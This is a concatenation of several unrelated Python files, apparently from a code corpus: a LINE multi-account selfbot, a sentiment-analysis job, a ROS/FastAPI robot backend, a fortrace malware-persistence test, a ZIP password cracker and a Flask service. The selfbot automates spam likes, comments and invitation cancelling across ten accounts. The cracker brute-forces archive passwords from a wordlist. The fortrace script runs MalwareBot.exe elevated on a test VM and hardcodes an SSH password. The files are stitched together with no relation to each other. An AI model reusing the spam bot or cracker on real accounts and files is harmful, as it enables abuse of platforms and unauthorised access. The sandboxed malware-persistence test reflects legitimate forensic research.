xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "กรุณาตั้งเวลาการอ่านใหม่อีกครั้งโปรดพิมพ์ ➠ Lurk on")
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to, "[อัตโนมัติ]: " + text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1", "STKVER": "100" }
cl.sendMessage(msg)
if op.type == 26:
msg = op.message
if msg.contentType == 16:
url = msg.contentMetadata['postEndUrl']
cl.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
ki1.like(url[25:58], url[66:], likeType=1001)
ki1.comment(url[25:58], url[66:], wait["comment1"])
ki2.like(url[25:58], url[66:], likeType=1001)
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.like(url[25:58], url[66:], likeType=1001)
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.like(url[25:58], url[66:], likeType=1001)
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.like(url[25:58], url[66:], likeType=1001)
ki5.comment(url[25:58], url[66:], wait["comment1"])
ki6.like(url[25:58], url[66:], likeType=1001)
ki6.comment(url[25:58], url[66:], wait["comment1"])
ki7.like(url[25:58], url[66:], likeType=1001)
ki7.comment(url[25:58], url[66:], wait["comment1"])
ki8.like(url[25:58], url[66:], likeType=1001)
ki8.comment(url[25:58], url[66:], wait["comment1"])
ki9.like(url[25:58], url[66:], likeType=1001)
ki9.comment(url[25:58], url[66:], wait["comment1"])
ki10.like(url[25:58], url[66:], likeType=1001)
ki10.comment(url[25:58], url[66:], wait["comment1"])
print ("AUTO LIKE DPK🐲BOT")
print ("Auto Like By.☬ARIFISTIFIK☬")
if op.type == 15:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n เเล้วพบใหม่นะ ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
cl.sendImageWithUrl(op.param1,image)
msg.contentType = 7
msg.contentMetadata={
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'707'
}
cl.sendMessage(msg)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(op.param1,image)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n[🙋ยินดีตอนรับ][By. ☬ARIFISTIFIK☬]")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["bcommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["bcomment"]))
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["acommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["acomment"]))
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["ccommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["ccomment"]))
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2(now=None):
    """Return True unless the minute of *now* is a multiple of 10.

    Args:
        now: Optional ``datetime`` to test; defaults to the current time
            (backward-compatible with the original zero-argument call).

    Returns:
        False when the minute is one of 10/20/30/40/50/00, True otherwise.
    """
    if now is None:
        now = datetime.now()
    # BUG FIX: the original sliced the 2-character "%M" string with [14:],
    # which is always "", so the membership test never matched and the
    # function unconditionally returned True.
    minute = datetime.strftime(now, "%M")
    return minute not in ["10", "20", "30", "40", "50", "00"]
def nameUpdate():
    # Background worker: while the "clock" feature is enabled, append the
    # current time (e.g. "༺12:34༻") to the configured base display name and
    # push the updated profile to LINE, then sleep before the next refresh.
    # Relies on module-level globals `wait` (config dict) and `cl` (client).
    while True:
        try:
            #while a2():
            #pass
            if wait["clock"] == True:
                now2 = datetime.now()
                nowT = datetime.strftime(now2,"༺%H:%M༻")
                profile = cl.getProfile()
                profile.displayName = wait["cName"] + nowT
                cl.updateProfile(profile)
                time.sleep(600)
        except:
            # Deliberately swallow everything so this updater thread never
            # dies (network errors from cl.updateProfile are common).
            # NOTE(review): when wait["clock"] is False the loop spins
            # without sleeping — confirm whether the sleep belongs outside
            # the if (original indentation was lost in extraction).
            pass
# Start the clock/display-name updater as a daemon so it never blocks exit.
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
# Main polling loop: fetch pending LINE operations and dispatch each to bot().
while True:
    try:
        # Fetch up to 5 operations newer than the current revision cursor.
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            # Advance the revision cursor so processed ops are not re-fetched.
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
|
sentiment_analysis.py | """Run sentiment analysis over database records.

This module loads a fine-tuned transformer model and writes a sentiment
label into the configured output column for each queried row.
"""
import os
import threading
import psycopg2
from transformers import pipeline
from api.services.transformers import overall_sentiment_transformers
from flask import Flask
import config
from utils.logger import setup_logging, log_info
from dbms import client, Databse
# Configure logging from the conf file next to this module before anything
# else creates loggers.
setup_logging(
    os.path.join(os.path.abspath(os.path.dirname(__file__)), "logging.conf")
)  # important to do this first
# Resolve environment-specific configuration (defaults to "production").
APP_CONFIG = config.get_named_config(os.getenv("DEPLOYMENT_ENV", "production"))
class LoadModel:  # pylint: disable=too-few-public-methods
    """Holds the shared sentiment-analysis pipeline for the job."""

    # Populated once by preload_models(); remains None until then.
    classifier = None
    model_id = APP_CONFIG.MODEL_ID

    @classmethod
    def preload_models(cls):
        """Load the fine-tuned transformer model into ``cls.classifier``."""
        model = pipeline(
            "sentiment-analysis", model=cls.model_id, truncation=True
        )
        cls.classifier = model
        return 0
# pylint:disable=no-member
def create_app(run_mode=os.getenv("FLASK_ENV", "production")):
    """Build and return a configured Flask app (factory pattern)."""
    flask_app = Flask(__name__)
    flask_app.config.from_object(config.CONFIGURATION[run_mode])
    flask_app.logger.info("<<<< Starting Sentiment analysis job >>>>")
    register_shellcontext(flask_app)

    # Load the transformer model on a worker thread, then block until ready.
    loader = threading.Thread(target=LoadModel.preload_models)
    loader.start()
    log_info("Model is loading...")
    loader.join()
    log_info("Model loading complete.")

    flask_app.classifier = LoadModel.classifier
    return flask_app
def register_shellcontext(app):
    """Attach a shell-context factory exposing *app* to ``flask shell``."""

    def _context():
        """Objects made available in the interactive shell."""
        return {"app": app}  # pragma: no cover

    app.shell_context_processor(_context)
def update_sentiment():
    """Update sentiment by querying the records.

    Connects to the configured database, discovers the table's primary
    keys, fetches up to 100 rows whose output column is unpopulated (per
    client.get_row_query), classifies each, and commits the updates.
    Raises any database error after ensuring the connection is closed.
    """
    conn = None
    try:
        log_info("Starting sentiment analysis.")
        # connect to the PostgreSQL server
        conn = client.connect(Databse[APP_CONFIG.DBMS].value, APP_CONFIG)
        table_name = APP_CONFIG.DATABASE_TABLE_NAME
        input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
        output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
        # Find primary key for the table.
        primary_keys = _find_primary_keys(conn, table_name)
        log_info(f"found primary keys : {primary_keys}")
        # Query the rows from table. PKs are included so each row can be
        # identified again when the sentiment is written back.
        cols_to_query = f"{primary_keys},{input_col}"
        rows_query = client.get_row_query(
            Databse[APP_CONFIG.DBMS].value,
            cols_to_query,
            table_name,
            output_col,
            limit=100,  # process at most 100 rows per run
        )
        log_info("Query executed")
        try:
            cur = conn.cursor()
            cur.execute(rows_query)
            # Capture column names so rows can be turned into dicts later.
            colnames = [desc[0] for desc in cur.description]
            results = cur.fetchall()
        finally:
            cur.close()
        _perform_analysis(colnames, conn, results)
        # commit the changes
        conn.commit()
    except (Exception, psycopg2.DatabaseError) as error:  # noqa
        raise error
    finally:
        if conn is not None:
            conn.close()
def _find_primary_keys(conn, table_name):
"""Fetch the primary keys of rows that match the pf_query."""
# Generalized query to support different databases.
pk_query = (
f"SELECT column_name FROM information_schema.table_constraints AS tc "
f"JOIN information_schema.key_column_usage AS kc ON tc.CONSTRAINT_CATALOG = "
f"kc.CONSTRAINT_CATALOG AND tc.CONSTRAINT_SCHEMA = "
f"kc.CONSTRAINT_SCHEMA AND tc.CONSTRAINT_NAME "
f" = kc.CONSTRAINT_NAME AND tc.TABLE_CATALOG = kc.TABLE_CATALOG AND tc.TABLE_SCHEMA "
f"= kc.TABLE_SCHEMA AND tc.TABLE_NAME = kc.TABLE_NAME "
f"WHERE constraint_type = 'PRIMARY KEY' AND (tc.table_name) = "
f"('{table_name}') ORDER BY ordinal_position;"
)
try:
cur = conn.cursor()
cur.execute(pk_query)
primary_keys = ",".join(cur.fetchall()[0])
finally:
cur.close()
return primary_keys
def _perform_analysis(colnames, conn, results):
    """Classify each fetched row and write the sentiment back to the table.

    Args:
        colnames: Column names matching the positions in each result tuple.
        conn: Open DB-API connection (caller commits).
        results: Row tuples fetched by the caller's query.
    """
    table_name = APP_CONFIG.DATABASE_TABLE_NAME
    input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
    output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
    # Create a list of dicts with column name and results.
    query_results = [dict(zip(colnames, result)) for result in results]
    count: int = 0
    for result_dict in query_results:
        log_info(f"Finding sentiment for {result_dict}")
        sentiment = overall_sentiment_transformers(result_dict.get(input_col))
        log_info(f"Sentiment {sentiment}")
        # SECURITY FIX: the original interpolated the sentiment and every
        # row value directly into the SQL string. Values now go through
        # query parameters; identifiers (table/column names) come from app
        # config, not user input, so f-string use for them is acceptable.
        update_qry = f"update {table_name} set {output_col}=%s where 1=1 "
        params = [sentiment]
        for key, value in result_dict.items():
            if key != input_col:
                update_qry += f" AND {key}=%s "
                params.append(value)
        cur = conn.cursor()
        try:
            cur.execute(update_qry, params)
        finally:
            cur.close()
        count += 1
    print(f"Updated {count} records")
def run():
    """Entry point: build the app, push its context, process the records."""
    flask_app = create_app()
    flask_app.app_context().push()
    update_sentiment()


if __name__ == "__main__":
    run()
|
main.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
from os import path
import rospy
import threading
from typing import Dict, Any
from std_msgs.msg import String
import uvicorn
from pydantic import BaseModel
from fastapi import FastAPI, Request
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import HTMLResponse, JSONResponse, FileResponse
from shutil import copyfile
from os import remove
# ROS related
# Initialise the ROS node on a background thread; disable_signals lets rospy
# coexist with the web server's own signal handling on the main thread.
threading.Thread(
    target=lambda: rospy.init_node("backend", disable_signals=True)
).start()
# function wait until drawing picture will be available
def picture_exist() -> str:
    """Block until the generated drawing appears on disk; return its path."""
    home = rospy.get_param("/backend/home_path")
    pic_file = home + "/dist/assets/static/pic.png"
    # Poll every 3 s until the drawing pipeline has written the file.
    while not path.exists(pic_file):
        time.sleep(3)
    return pic_file
# save generated picture to static folder
def callback_path_to_picture(ros_data: String) -> None:
    """Copy the freshly generated picture into the served static folder."""
    home = rospy.get_param("/backend/home_path")
    destination = home + "/dist/assets/static/pic.png"
    # ros_data.data carries the source path published by the drawing node.
    copyfile(ros_data.data, destination)
# check robot status
def callback(ros_data: String) -> None:
    """Track robot availability from /film messages ('start'/'stop')."""
    global status
    message = ros_data.data
    if message == "start":
        status = "busy"
    elif message == "stop":
        status = "available"
    else:
        # Any other payload is a protocol error worth surfacing in the logs.
        rospy.logwarn("Error status message. should be 'start' or 'stop'.")
# ros subscribers and listeners
# Publishers: outgoing commands to the robot stack.
word_publisher = rospy.Publisher("/word_for_gakachu", String, queue_size=1)
color_publisher = rospy.Publisher("/color_height", String, queue_size=1)
test_publisher = rospy.Publisher("/run", String, queue_size=1)
# Subscribers: robot busy/available status and generated-picture paths.
status_listener = rospy.Subscriber("/film", String, callback, queue_size=1)
picture_path_listener = rospy.Subscriber("/run", String, callback_path_to_picture, queue_size=1)
# Frontend build directory that FastAPI serves below.
dist_dir = rospy.get_param("/backend/dist")
# Fast API related
app = FastAPI()
class Word(BaseModel):
word: str
origins = ["*"]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
# Mounting
app.mount("/dist", StaticFiles(directory=dist_dir), name="dist")
app.mount("/loading", StaticFiles(directory=dist_dir + "loading/"), name="loading")
app.mount("/assets", StaticFiles(directory=dist_dir + "assets/"), name="assets")
app.mount("/css", StaticFiles(directory=dist_dir + "assets/css"), name="css")
app.mount("/data", StaticFiles(directory=dist_dir + "assets/data/"), name="data")
app.mount("/Dev", StaticFiles(directory=dist_dir + "assets/data/dev"), name="Dev")
app.mount("/js", StaticFiles(directory=dist_dir + "assets/js"), name="js")
app.mount("/static", StaticFiles(directory=dist_dir + "assets/static"), name="static")
templates = Jinja2Templates(directory=dist_dir)
status = "available"
# main page
@app.get("/", response_class=HTMLResponse)
def root(request: Request) -> Any:
return templates.TemplateResponse("index.html", {"request": request})
# page for robot painting
@app.get("/Loading", response_class=HTMLResponse)
def loading_page(request: Request) -> Any:
return templates.TemplateResponse("loading/index.html", {"request": request})
# Result page
@app.get("/drawing-finished", response_class=HTMLResponse)
def finish_page(request: Request) -> Any:
    """Serve the result page and delete the rendered picture so the next run starts clean."""
    dirname = rospy.get_param("/backend/home_path")
    path_to_pic_file = dirname + "/dist/assets/static/pic.png"
    # Fix: reloading this page after the picture was already removed raised
    # FileNotFoundError; a missing file simply means it is already cleaned up.
    try:
        remove(path_to_pic_file)
    except FileNotFoundError:
        pass
    return templates.TemplateResponse("drawing-finished/index.html", {"request": request})
# Receive the word the robot should draw.
@app.post("/send_word", response_class=JSONResponse)
def send_word(words: Word) -> Dict[str, str]:
    """Forward the submitted word to the robot over ROS and acknowledge."""
    message = String(words.word)
    word_publisher.publish(message)
    return {"status": "OK"}
# return robot status - "available" or "busy"
@app.get("/status", response_class=JSONResponse)
def status_response() -> Dict[str, str]:
    """Report whether the robot is currently drawing ("busy") or idle ("available")."""
    return {"status": status}
# In DEV mode correct brush height
@app.get("/brush_lower", response_class=JSONResponse)
def lower() -> Dict[str, str]:
    """Nudge the brush down one step (dev-mode calibration)."""
    color_publisher.publish("minus")
    return {"status": "OK"}

@app.get("/brush_raise", response_class=JSONResponse)
def raiser() -> Dict[str, str]:
    """Nudge the brush up one step (dev-mode calibration)."""
    color_publisher.publish("plus")
    return {"status": "OK"}

# Do smear to test current brush height
@app.get("/test_brush_position", response_class=JSONResponse)
def test_position() -> Dict[str, str]:
    """Ask the robot to paint a test smear so the operator can judge the brush height."""
    # NOTE(review): publishes a robot-host-specific image path on "/run" --
    # confirm this file exists on the robot side.
    test_publisher.publish("/home/kuka/kuka_pics/empty.png")
    return {"status": "OK"}
# return the drawn picture (blocks until the file exists on disk)
@app.get("/picture", response_class=FileResponse)
def drawing_picture_return():
    """Serve the finished drawing; picture_exist() polls until the file appears."""
    return picture_exist()

# return qr code picture
@app.get("/qr", response_class=FileResponse)
def qr_picture_return():
    """Serve the static QR-code image shipped with the frontend assets."""
    dirname = rospy.get_param("/backend/home_path")
    path_to_qr_file = dirname + "/dist/assets/static/qr.png"
    return path_to_qr_file
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=5000, log_level="debug")
|
simpleMalwareSerPer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Tests persistence mechanism of malware component by creating an autostart service
import sys
import time
import logging
import subprocess
import threading
import paramiko
try:
from fortrace.core.vmm import Vmm
from fortrace.utility.logger_helper import create_logger
from fortrace.core.vmm import GuestListener
except ImportError as e:
print("Import error in fortracemaster.py! " + str(e))
sys.exit(1)
def create_vm(logger):
    """Create a Windows guest VM via fortrace's Vmm and block until its agent connects.

    :param logger: logger used for progress output
    :return: connected guest object
    """
    # virtual_machine_monitor1 = Vmm(logger, linux_template='linux_template')
    macsInUse = []
    guests = []
    guestListener = GuestListener(guests, logger)
    virtual_machine_monitor1 = Vmm(macsInUse, guests, logger)
    # guest = virtual_machine_monitor1.create_guest(guest_name="l-guest01", platform="linux", boottime=None)
    guest = virtual_machine_monitor1.create_guest(guest_name="w-guest01", platform="windows", boottime=None)
    logger.debug("Try connecting to guest")
    # busy-wait until the in-guest agent reports back
    while guest.state != "connected":
        logger.debug(".")
        time.sleep(1)
    logger.debug(guest.guestname + " is connected!")
    return guest
def start_malware_server(config):
    """Run MalwareServer.exe on the staging host over SSH and dump its output.

    Blocks until the remote server process exits.

    :param config: name of the server config file passed to MalwareServer.exe
    """
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect("192.168.122.219", username="fortrace-service", password="$Anfang01")
    # Fix: use a raw string -- in the original non-raw literal "\u..." is an
    # (invalid) escape sequence and a SyntaxError on Python 3.
    command = r"cd C:\users\fortrace-service\Desktop & MalwareServer.exe " + config
    ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command)
    # Block until the remote process terminates.
    exit_status = ssh_stdout.channel.recv_exit_status()
    print("Malware Server: Error", exit_status)
    print("----------------------------------------------------------\n")
    print("Malware Server: \n")
    print(ssh_stderr.read())
    print(ssh_stdout.read())
    print("\n----------------------------------------------------------\n")
    # Fix: close the SSH session instead of leaking the connection.
    ssh.close()
    return
def main():
    """
    Test Script for fortrace.

    Provisions a Windows guest, serves MalwareBot.exe to it, installs the bot
    as a persistent autostart service, then power-cycles the guest to verify
    that the persistence mechanism survives a reboot.
    :return: no return value
    """
    try:
        logger = create_logger('fortraceManager', logging.DEBUG)
        logger.info("This is a test script to check the functionallity of the fortrace library" + '\n')
        guest = create_vm(logger)
        # serve the malware binary and its service-persistence config in the background
        serverThread = threading.Thread(target=start_malware_server, args=["server_config_service_per.txt"])
        serverThread.start()
        # download the bot inside the guest via Firefox
        browser_obj = guest.application("webBrowserFirefox", {'webBrowser': "firefox"})
        browser_obj.open(url="192.168.122.219:8080/MalwareBot.exe")
        while browser_obj.is_busy:
            time.sleep(2)
        time.sleep(60)
        print("Sleep completed")
        # confirm the browser's download dialog via keystrokes
        browser_obj.press_tab_test()
        time.sleep(20)
        browser_obj.press_enter_test()
        time.sleep(30)
        # NOTE(review): non-raw string -- "\u..." escapes only pass on Python 2;
        # on Python 3 this line is a SyntaxError. Should be a raw string.
        guest.runElevated('"C:\users\fortrace\Downloads\MalwareBot.exe" "dnsServer=192.168.122.219 webServer=192.168.122.219 webPort=7777 Beacon=1"')
        serverThread.join()
        print("Before shutdown")
        # power-cycle the guest ('keep' preserves the disk image) ...
        guest.shutdown('keep')
        while guest.isGuestPowered():
            time.sleep(1)
        time.sleep(10)
        # ... then serve the beacon-interval config for the auto-restarted bot
        serverThread = threading.Thread(target=start_malware_server, args=["server_config_interval.txt"])
        serverThread.start()
        time.sleep(5)
        guest.start()
        guest.waitTillAgentIsConnected()
        time.sleep(50)
        serverThread.join()
        guest.remove("keep")
        ######## CLEANUP ############# ERROR HANDLING
    except KeyboardInterrupt as k:
        logger.debug(k)
        logger.debug("KeyboardInterrupt")
        logger.debug(k)
        # NOTE(review): virtual_machine_monitor1 is local to create_vm(), so the
        # two references below raise NameError (only the second is caught);
        # raw_input is Python 2 only.
        logger.debug(virtual_machine_monitor1)
        raw_input("Press Enter to continue...")
        virtual_machine_monitor1.clear()
        logger.debug("cleanup here")
        try:
            virtual_machine_monitor1.clear()
        except NameError:
            logger.debug("well, host1 was not defined!")
        exit(0)
    except Exception as e:
        logger.debug("main gets the error: " + str(e))
        logger.debug("cleanup here")
        raw_input("Press Enter to continue...")
        try:
            virtual_machine_monitor1.clear()
            subprocess.call(["/etc/init.d/libvirt-bin", "restart"])
        except NameError:
            logger.debug("well, host1 was not defined!")
        sys.exit(1)
if __name__ == "__main__":
    try:
        main()
    # NOTE(review): bare except also swallows KeyboardInterrupt and hides the
    # traceback; `except Exception` plus logging would be safer.
    except:
        sys.exit(1)
|
zip_file_cracker.py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2019-04-26 1:01
# @Author : Zhang Bin
# @Site : home
# @File : zip_file_cracker.py
# @Software: PyCharm
import zipfile
import optparse
from threading import Thread
def extract_file(file, password):
    """Try *password* against the archive; print it when extraction succeeds."""
    try:
        file.extractall(pwd=password)
        print '[+] Found password: ' + password + '\n'
    except:
        # wrong password (or corrupt entry) -- ignore and let other threads continue
        pass
def main():
    """Entry point: parse CLI options and brute-force the ZIP password with a wordlist."""
    # define the CLI options
    parser = optparse.OptionParser("usage %prog -f <zipfile> -d <dictionary>")
    parser.add_option('-f', dest='zname', type='string', help='specify zip file')
    parser.add_option('-d', dest='dname', type='string',
    help='specify dictionaty file')
    (options, args) = parser.parse_args()
    # NOTE(review): bitwise `|` only works here because `==` yields bools;
    # `options.zname is None or options.dname is None` would be clearer.
    if (options.zname == None) | (options.dname == None):
        print parser.usage
        exit(0)
    else:
        zname = options.zname
        dname = options.dname
    # open the target zip archive
    z_file = zipfile.ZipFile(zname)
    # try every password from the dictionary, one thread per candidate
    with open(dname, 'r') as f:
        for line in f.readlines():
            password = line.strip('\n')
            t = Thread(target=extract_file, args=(z_file, password))
            t.start()
if __name__ == '__main__':
main()
|
backend.py | from werkzeug.serving import make_server
from flask import Flask
from threading import Thread
import os
import toml
import json
from .interface import ServiceInterface
from .logger import debug
from .consts import DATA_SOURCES, NAME
HOST = '127.0.0.1'
PORT = 9006


class FlaskServer(object):
    """Run a Flask app in a background thread via werkzeug's make_server.

    Routes are supplied as dicts with 'rule', 'endpoint', 'view_func' and
    'methods' keys and are registered when start() is called.
    """

    def __init__(self, name, host=HOST, port=PORT, routes=None):
        # Fix: the original used a mutable default argument (routes=[]) which
        # is shared across every FlaskServer instance; default to a fresh list.
        self.port = port
        self.host = host
        self.running = False
        self.app = None      # Flask application, created in start()
        self.thread = None   # serving thread, created in start()
        self.name = name
        self.srv = None      # werkzeug server, created in start()
        self.routes = [] if routes is None else routes

    def start(self):
        """Build the Flask app, register all routes and serve in a background thread."""
        self.app = Flask(self.name)
        for route in self.routes:
            rule = route['rule']
            endpoint = route['endpoint']
            view_func = route['view_func']
            methods = route['methods']
            debug("Adding rule:%s as (%s)" % (rule, endpoint))
            self.app.add_url_rule(rule, endpoint=endpoint,
                                  view_func=view_func, methods=methods)
        self.srv = make_server(self.host, self.port, self.app)
        self.thread = Thread(target=self.run_app, args=())
        _params = (self.name, self.host, self.port)
        debug("Starting server (%s) in thread: %s:%s" % _params)
        self.thread.start()

    def stop(self):
        """Shut the werkzeug server down and join the serving thread."""
        if self.srv is not None:
            debug("Stopping server (%s)" % (self.name))
            self.srv.shutdown()
            self.thread.join()

    def run_app(self):
        """Thread target: serve requests until shutdown() is called."""
        debug("Running the app server (%s) in an infinite loop " % (self.name))
        self.srv.serve_forever()
class QueryService(ServiceInterface):
    """Service exposing top-sites data sources over a small HTTP API.

    Endpoints: '/' (liveness), '/topsites/update', '/topsites/load' and
    '/topsites/check/<domain>'. HTTP serving is delegated to FlaskServer.
    """
    HOST = '127.0.0.1'
    PORT = 9006

    def __init__(self, sources=None, **kargs):
        # Fix: the original used a mutable default (sources=[]) which would be
        # shared by all instances created without an explicit sources list.
        super(QueryService, self).__init__(**kargs)
        self.sources = [] if sources is None else sources
        # Route table handed to the embedded FlaskServer.
        self.routes = [
            {'rule': "/",
             "endpoint": "test",
             "view_func": self.test,
             "methods": ['GET', ],
             },
            {'rule': "/topsites/update",
             "endpoint": "update",
             "view_func": self.update,
             "methods": ['GET', ],
             },
            {'rule': "/topsites/load",
             "endpoint": "load",
             "view_func": self.load,
             "methods": ['GET', ],
             },
            {'rule': "/topsites/check/<domain>",
             "endpoint": "check",
             "view_func": self.check,
             "methods": ['GET', ],
             },
        ]
        self.name = kargs.get('name', '')
        self.server = FlaskServer(routes=self.routes, **kargs)

    def test(self, **kargs):
        """Liveness probe for '/'."""
        debug("Testing server (%s) sources " % (self.name))
        return 'works'

    def update(self, **kargs):
        """Refresh every data source from its upstream ('/topsites/update')."""
        debug("Updating server (%s) sources " % (self.name))
        for s in self.sources:
            s.update()
        return json.dumps({'operation': 'load', 'result': True})

    def load(self, **kargs):
        """(Re)load every data source from local storage ('/topsites/load')."""
        debug("Loading server (%s) sources " % (self.name))
        for s in self.sources:
            s.load()
        return json.dumps({'operation': 'load', 'result': True})

    def load_and_start(self, **kargs):
        """Convenience wrapper: load all sources, then start serving."""
        debug("Loading server (%s) sources " % (self.name))
        for s in self.sources:
            s.load()
        self.start()

    def check(self, domain=None, **kargs):
        """Query every source for *domain*; return per-source hits as JSON."""
        debug("Checking server (%s) sources for %s" % (self.name, domain))
        source_results = {'operation': 'check',
                          'domain': domain,
                          'results': {}}
        if domain is None:
            # NOTE(review): this branch returns a dict while the normal path
            # returns a JSON string -- kept as-is for backward compatibility.
            return source_results
        for s in self.sources:
            r = s.check(domain)
            if len(r) == 0:
                continue
            source_results['results'][s.name] = r
        return json.dumps(source_results)

    def start(self):
        """Start the embedded HTTP server."""
        debug("Starting service (%s)" % (self.name))
        self.server.start()

    def stop(self):
        """Stop the embedded HTTP server."""
        debug("Stopping service (%s)" % (self.name))
        self.server.stop()

    @classmethod
    def parse_toml(cls, toml_dict):
        """Build a QueryService from a parsed TOML dict.

        Expects a per-service block (keyed by NAME, or the whole dict) with a
        'sources' table mapping names to typed source blocks.
        :raises Exception: when no sources are given or a type is unknown
        """
        ts_block = toml_dict[NAME] if NAME in toml_dict else toml_dict
        sources_blocks = ts_block.get('sources', {})
        if len(sources_blocks) == 0:
            raise Exception("One or more data sources must be specified")
        sources = []
        for block in sources_blocks.values():
            bt = block.get('type', None)
            if bt is None or bt not in DATA_SOURCES:
                raise Exception("Source type is not valid or unknown: %s" % bt)
            b_cls = DATA_SOURCES.get(bt)
            source = b_cls.parse_toml(block)
            sources.append(source)
        kargs = {'sources': sources}
        kargs['host'] = ts_block.get('host', HOST)
        kargs['port'] = ts_block.get('port', PORT)
        kargs['name'] = ts_block.get('name', 'not specified')
        return cls(**kargs)

    @classmethod
    def parse_toml_file(cls, toml_file):
        """Parse *toml_file* and build the service.

        Fix: the original called toml.load(open(...)) and leaked the file
        handle; use a context manager so it is always closed. The useless
        try/except that only re-raised has been dropped.
        """
        os.stat(toml_file)  # fail fast with a clear OSError if the file is missing
        with open(toml_file) as fh:
            toml_dict = toml.load(fh)
        return cls.parse_toml(toml_dict)
|
hackrf.py | from scapy.all import *
from mirage.libs import wireless,io,utils
from mirage.libs.ble_utils.constants import *
from mirage.libs.common.sdr import sources,demodulators,decoders,sinks,modulators
from mirage.libs.ble_utils.decoders import BLEDecoder
from mirage.libs.ble_utils.encoders import BLEEncoder
from mirage.libs.ble_utils.helpers import *
import time
